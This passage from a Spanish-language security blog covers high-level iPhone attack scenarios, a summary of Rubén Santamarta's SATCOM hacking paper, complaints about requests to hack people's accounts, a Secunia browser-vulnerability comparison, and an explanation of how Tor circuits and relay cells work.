8) A través de un hijacking de Facebook: Pipi tiene iOS 6, ha sincronizado su iPhone con Facebook pero se conecta desde redes WiFi inseguras y le capturan una cookie de sesión de Facebook. Le hacen un hijacking a su cuenta y se descargan todos los contactos. 

9) Preguntando a Siri: Tiene un iPhone 4S con Siri activado, alguien tiene acceso al terminal y se dedica a preguntarle a Siri todos los teléfonos de la agenda que le interesan. 

10) JavaScript Botnet: Su iPhone se conecta a una Rogue WiFi que se llama Public o Free. Pipi se había conectado anteriormente a una red llamada así y como iPhone no comprueba el BSSID se come una JavaScript Botnet con la que le hacen un Phishing


... Y tantos y tantos esquemas de ataque como se os ocurran que me he dejado el shoulder surfer, un pairing de BlueToohllamar a algún iGenius a que nos de la password de Pipi o un troyano en su computadora personal. Lo cierto es que pensar que un iPhone o, o cualquier smartphone, es invulnerable es una autentica temeridad. Ten cuidado con lo que guardas en tu iPhone, no vaya a ser que acabe en Pastebin.

PD: Encontrarme este post, me ha recordado mucho a cuando hace un tiempo me dedicaba "a jugar" con iOS y como ha he dicho antes, llegar a redactar un informe a un amigo mío con iPhone, con la mayoría de estas formas más algunas que yo le dije, si mi amigo viese ahora este post me mata nada más que por el rato que le hice pasar estando encima de él para que hiciese las cosas bien je je je. Porque como digo "las cosas o se hacen bien o no se hacen"

miércoles, 20 de agosto de 2014

Hack You By Air, Sea and Land

Para aprender sobre seguridad, es necesario leer mucho, ver tutoriales, ver conferencias de mucha gente y estudiar; si no te gusta leer amigo vas mal. Además siempre hay por aprender ya que esto es tan inmenso que nunca lo llegas a saber todo, por la amplitud de temas, porque lo que aprendiste hace un mes ya no sirve del todo porque se han actualizado y tú también tienes que actualizarte en tus conocimientos.

Una de las cosas que yo recomiendo-con lo poco que sé-es que si tenéis oportunidad leáis y estudies si os gusta esto. Por ejemplo unos de los papers que no te puedes perder son los que van saliendo para BlacHat, como el de Rubén Santamarta, que es bastante interesante y que os lo resumo un poco.

Al principio te hace una introducción sobre los tipos de infraestructuras de SATCOM y en cuántos segmentos se podría dividir, Rubén dice que en dos; que son el espacio y el suelo. Y te habla un poco sobre cada infraestructura como el Inmarsat-C que es una infraestructura en los barcos de costa (ship-to-shore) o el VSAT que son usados en los satélites transpondedores y que incluso puede transmitir video, imágenes, voz y datos -sobre todo en los C-Band o Ku-Band es donde se da esto-.

Figura 1: Paper de Rubén Santamarta

Rubén ha ido buscando fallos en barcos, satélites o en equipos de armamento militares-lo que se parece bastante a Hollywood, pero que no se aleja tanto, la ciberguerra es un hecho- yo seguiré explicando un poco de lo que habló en su Paper, aún así te dejo el vídeo de la charla que él lo explica muchísimo mejor y así te enteres más de lo que ha tratado su investigación.

La lista de los dispositivos que él se ha encargado de investigar es bastante larga, así que os pondré ya para terminar con este post una tabla donde se resume todo esto y que queda bastante claro.

Figura 2: Tabla de  dispositivos que Rubén investigó para su
paper


Una vez que se ve esta tabla, el paper se dedica a explicar detalladamente caso a caso, por eso si queréis ampliar vosotros por vuestra cuenta un poco más sobre lo que escribió os lo dejo sin problemas {SATCOM Terminals: Hacking by Space, Sea and Land}. Esto recuerda un poco Stuxnet, pero para mí es incluso peor, por que una de las cosas de las que también se hablan en este paper es en el de la posibilidad de se tome control a un equipo de entretenimiento de u avión militar, simplemente estando conectado a la misma red que el avión -se basa de las credenciales hardcodeadas de los equipos o Backdoors, cada vez que un sistema operativo infectado se conecte a la misma red del dispositivo. Tampoco me quiero imaginar lo que podrían hacer con un Controlador lógico programable,PLC. Miedo++.



Saludos Malvados!

martes, 19 de agosto de 2014

¿Y si nos levantamos?

El post de hoy no tiene sentido polémico ni revolucionario, pero el post que escribí ayer; ya fue la gota que colmó el vaso y me harte y me llegué a enfadar, porque ya es suficiente de que se piense que siempre somos los hackers los malos, cuando simplemente trabajamos-haciendo barrabasadas a las webs- para su seguridad; después crear el informe con todos sus fallos y que los solucionen y nos les vuelva a ocurrir, pero la gente-muchos de ellos- siguen amenazando con denunciar, y todo por culpa de noticias erróneas y falsas que yo creo que ya es hora de denunciar lo que no es verdad; que sepan usar la palabra "hacker"-no para hacer mención a criminales-.

Figura 1: Arrestan a un "super hacker" de 19 años
Noticias como la de la Figura 1, son las que confunden a la gente; este tipo de cosas no las hacen hackers, estoy harto de leer noticias así. Porque si nos ponemos así; todos los periodistas son mentirosos que se inventan noticias sin fuentes verídicas, todos los curas son pederastas, todos los luchadores son brutos, todos los futbolistas van lanzando balones a las gradas,etc. Pero claro, de sus profesiones ni hables porque si no ya si que eres malo del todo.

Por eso el título del post de hoy, y es que hace unos días coincidí con este anuncio en Youtube y me dio una idea para un post. Reitero que no pretendo invocar a una revolución ni nada por el estilo, solamente que se nos escuche y se nos respeten, ya que solamente hacemos nuestro trabajo; que no siempre los que se enfadan porque se les reporte un fallo tienen el poder, tienen que perder si los hackers nos levantamos.

Figura 2: ¿Y si nos levantamos?

No pretendo meterme con ninguna profesión, las respeto todas; lo único es que se respete también a lo que yo me dedico, que para nada es a cometer actos delictivos; es PREOCUPARME POR LA SEGURIDAD DE LAS PERSONAS DE UNA MANERA ÉTICA Y MORAL. Ahora eso sí, yo también tomaré mis medidas en cuanto a los correos que me mandan, lo mismo pasarlo como ya dije a los amigos de Delitos Informáticos de la Policía, aunque lo mismo hago lo que el señor AuronPlay.

Figura 3: Lección a ALGUNAS fans de los GEMELIERS

Saludos Malvados!

lunes, 18 de agosto de 2014

Hay que repetir que Hacker no es igual a Criminal

Ya he dicho muchas que los correos que me mandan pidiendo por ejemplo que Hackeé el Tuenti y el Twitter de gente o que hackeé el Whatsapp o muchas cosas más, es de pedir criminales y no hackers; pero parece que muchos/as aún no se enteran y siguen pidiendo cosas y más cosas y creo que es la última vez que las pongo en el Blog.

Figura 1: Si pasáis mucho tiempo en el Facebook, cuidado; van a pedir que
os espíen
Figura 2: Que hackee el Twitter y Whatsapp de su novia
Figura 3: No es el primero que salta con esta excusa
Figura 4: Que hackeé a un profesor }:S
Figura 5: Hackear el Facebook y Twitter
Figura 6: Hackear el Whatsapp de alguien

Esta creo que será la última vez que suba al Blog los correos que me mandan pidiendo que cometa actos delictivos, yo no tengo que hacer lo que me piden ya que me puedo jugar la cárcel-bueno no me lo juego, porque NUNCA hago lo que me piden, ni ningún acto delictivo- así que la próxima vez, les pasaré este tipo de correos a los amigos de Delitos Informáticos, a ver qué piensan ellos };)

Saludos Malvados!

domingo, 17 de agosto de 2014

Secunia y los 50 programas más afectados

Hace unos días estuve debatiendo con una persona sobre Google Chrome y que supuestamente según esta persona "Google Chrome es más seguro que Internet Explorer"-Navegador que yo uso, más que Google Chrome- y me recordó a otro debate que tuve con un compañero con el que estaba trabajando en su época y que era sobre el mismo tema; yo lo que hice fue enseñarle la base de datos de expedientes de seguridad de Secunia y que le mostré los fallos de seguridad que en el 2012 tenía Google Chrome-eran 5 veces más que Internet Explorer-.

Figura 1: Internet Explorer con 41 vulnerabilidades; Chrome con 291

Otras de las cosas de las que estábamos debatiendo es en que yo no compartía lo que él decía de que "Me voy a comprar un Mac, que en Apple no hay virus y estoy más seguro", para eso ya le dejo el artículo por si lo quiere leer de que en Mac Sí hay virus. Pero lo que venía a contra es que en el debate que tuve hace poco con esta persona sobre que "Google Chrome era mejor y más seguro", esta persona por mucho que le insistía en que realmente no es así porque para empezar Google Chrome le manda "a su papi Google" todo lo que los robots de un sitio no inyectan...cuando digo todo es TODO. Pero ni con eso ni muchas otras cosas con las que le estaba argumentando no cambiaba de opinión y seguía en lo mismo-aunque no trato de convencer a nadie de nada, si él quiere pensar eso; que lo piense.Libertad ante todo-.Aunque ya que estamos, me pasé para ver cuáles eran los 50 programas más descargados del 2013 y cuáles eran los que más vulnerabilidades tenían, y me encontré con algo parecido a lo que pasaba en 2012, y es que Google Chrome era el segundo programa con más vulnerabilidades; así que amigo de debate, aquí tengo una razón más de porqué Google Chrome NO es más seguro que Internet Explorer.

Figura 2: Las Vulnerabilidades en 2013 de los 50 programas más descargados

Aquí se puede ver como Internet Explorer tiene 119 vulnerabilidades menos que Google Chrome, pero esto parece que no importa, porque "Google Chrome sigue siendo más seguro".Esto de tener tantísimas vulnerabilidades, es -como dirían los americanos- un "penis in the ass" que significa algo así como "es una putada"

Figura 3: Piensa bien qué navegador usar

Hay que pensar bastante bien qué navegador usar, ya que puede que alguna de estas vulnerabilidades te espíen la webcam, te roben las passwords y miles de cosas más y que van saliendo en noticias y que son bastantes problemáticos.

Saludos Malvados!

sábado, 16 de agosto de 2014

La Deep Web, La Red profunda y la Red Tor (III de ...)

Claves de OR:

Cada OR tiene un par de claves Privada/pública:

-Una clave de larga identidad que solamente sirve para firmar la información y certificados para permitir la identificación

-Una clave mediana de enrutamiento de cebolla que cifra las peticiones de establecimiento de circuito para así poder negociar las claves efímeras. Las claves antiguas, pueden ser usadas una semana después de que haya sido cambiada para dar tiempo que todo haya podido ser actualizado correctamente.

-Una clave pequeña de conexión que es usada en el handshake TLS. Esta clave se mete en el certificado que se firma con la clave de certificación. Hay que decir que ambos certificados se envían en el handshake TLS. El certificado de la clave certificación está firmado por la clave certificación, esta clave está autofirmada y debería ser cambiada una vez al día.

Establecimiento e iniciación de circuito:


Figura 2: Intercambio de mensajes para establecimiento de circuito
La cadena de OR´s que forman un circuito es construida de forma telescópica, esto es, el OP negocia las claves de sesión con cada sucesivo OR. Una ventaja de esta forma de operar es que se dejen una vez que éstas claves de sesión se dejen de utilizar y sean borradas, aunque un nodo sea comprometido no se podrá descifrar células viejas. El esquema se realiza con siguientes pasos:

-El OP escoge un OR como exit node (ORn), de acuerdo con su exit policy.
-EL OP escoge una cadena de OR's para constituir el path del circuito (OR1....ORn) de forma que ningún OR aparece dos veces en el path.
-El OP abre una conexión TLS con el entry-node (OR1 ) si es que no la tenía abierta
-El OP escoge aleatoriamente un ID de circuito (circID) que no se esté utilizando en la conexión con el entry-node
-El OP inicia un intercambio de clave Diffie-Hellman con el entry-node envíando una celda CREATE
-El entry-node le devuelve una celúla CREATED y de esta forma se obtiene una clave compartida Diffie-Hellman (D-H). De esta clave se derivan dos claves simétricas, una para cada sentido:
      -kf1 (forward key).- Se usará en la comunicación OP->OR1 del circuito
      -kb1 (backward key).- Se usará en la comunicación OR1->OP.
-A continuación el OP envía una petición a el OR1 para extender el circuito mediante una célula RELAY_EXTEND. Esta célula le indica al OR1 cual va a se el nuevo nodo OR2, su puerto y también contiene estructuras de datos que le tendrá que reenviar el OR1 al OR2 y que permitirán establecer un protocolo D-H de intercambio de claves entre el OP y OR2 a través de OR1 sin que el OR1 se entere de nada
-El OR1 coge la célula y realiza el procedimiento Diffie-Hellman escogiendo él mismo un nuevo circID apropiado. Observar que ahora la células CREATE/CREATED se intercambian entre el OR1 y el OR2.
-El OR1 manda al OP una célula RELAY_EXTENDED para mandarle lo que ha respondido el OR2 y así el OP tiene conocimiento de la clave D-H. La información está cifrada de tal forma que el nodo OR1 no puede acceder la información que se están intercambiando indirectamente el OP y OR2. De esta forma se establecen las nuevas claves simétricas: kf2 y kb2.

-De forma similar se continúa hasta conseguir que el OP tenga establecidas las claves kf1, kb1, kf2, kb2,..., kfn, kbn con los respectivos nodos OR.

Encapsulamientos de streams TCP:

Una vez que un circuito se ha establecido se procede con el encapsulamiento de los streams TCP que contienen los datos de la aplicación.

Un circuito ya establecido se puede aprovechar para multiplexar en él varios streams TCP provenientes de la misma o de distintas aplicaciones. De hecho, por eficiencia, Tor usa el mismo circuito para nuevos streams TCP durante diez minutos siempre que sea posible por la exit policy del exit node. Transcurridos los diez minutos, las peticiciones se darán a un nuevo circuito. Esto mejora la protección y evita que un atacante vincule tráficos antiguos con los nuevos.


El circuito permanecerá abierto hasta que todos los TCP streams que multiplexe hayan cerrado. Esta característica es necesaria para soportar muchos protocolos como SSH, los cuales son incapaces de mantener una sesión si se cambian los circuitos y, por tanto, el exit node, durante la sesión.

Figura 3: Conexión HTTP a través de un circuito Tor
Los pasos para encapsular el tráfico TCP son los siguientes:

-El OP escoge un circuito abierto que tenga un exit node que le permita conectarse de la formada adecuada con el servidor. Si no existe, lo crea según el algoritmo visto anteriormente
-El OP selecciona un StreamID arbitrario que no haya sido utilizado todavía en el circuito
-El OP construye una célula RELAY_BEGIN que contiene, cifrado adecuadamente para que sólo sea visto por el exit node, la dirección y el puerto destino de la comunicación.
-Esta célula es procesada por los nodos intermedios y el contenido útil es propagado hasta llegar en una célula RELAY_BEGIN que llega al exit-node
-El exit node obtiene la dirección y el puerto destino e intenta abrir una nueva conexión TCP con el host destino. Pueden suceder dos cosas.
-Si el exit node no puede establecer la conexión devuelve una célula RELAY_END.
-Si el exit node puede establecer la conexión devuelve una célula RELAY_CONNECTED que se irá propagando por la lista de OR´s hasta llegar al OP.
-Una vez que la célula RELAY_CONNECTED llega al OP, este y el exit node empaquetan el stream de datos TCP en células RELAY_DATA
-Si un OP quiere cerrar un stream TCP anonimizado envía una célula RELAY_END a lo largo del circuito y los nodos van cerrando ese stream para su circuito. Cuando llega al exit node, este cierre la conexión TCP. El exit node genera una célula RELAY_ENDED que se propaga hasta el OP.

Si el stream TCP que mantiene el exit node con el destino se cierra de forma abrupta, entonces el exit node envía a lo largo del circuito hasta el OP una célula RELAY_TEARDOWN que indica el cierre inesperado de la conexión. Por el camino se van cerrando los streams de circuito asociados a stream TCP.

Una vez que un OR recibe una célula RELAY, comprueba el circID de la célula y determina si tiene un circuito que se corresponda con esta a lo largo de la conexión. Si no lo tiene, descarta la célula. Por otra parte, si el OR no es exit node, entonces cifra o descifra la carga útil del stream usando la clave kb o kf correspondiente con el OP. El OR decide si reconoce la célula que está completamente descifrada. Si el OR reconoce la célula, la procesa. Si no, la pasa a lo largo del circuito. Si el exit node no reconoce una célula RELAY ocurre un error y el OR envía una célula DESTROY para cerrar el circuito.

Cuando una célula RELAY llega al OP, el OP descifra la carga útil con kbi. Si la carga útil está completamente descifrada procesa la carga útil.

Esto ha sido todo en cuanto a teoría, ahora quedará algún post más de lo que se puede encontrar por esta red, así que ha estudiar lo dicho en estas tres partes de artículo, ya que es bastante importante.

Saludos Malvados!

***************************************************************************
La Deep Web, La red profunda y la Red Tor (I de...)
La Deep Web, La red profunda y la Red Tor (II de...)
La Deep Web, La red profunda y la Red Tor (III de...)
La Deep Web, La red profunda y la Red Tor (IV de...)
***************************************************************************
Related Posts Plugin for WordPress, Blogger...

Entrada destacada

El server me sabe a poco.

Soy un fanático del Rock y de Debian . (Creo que voy a inventar Rockbian, que suena bien y todo xD) Llevaba tiempo queriendo unir estos 2 c...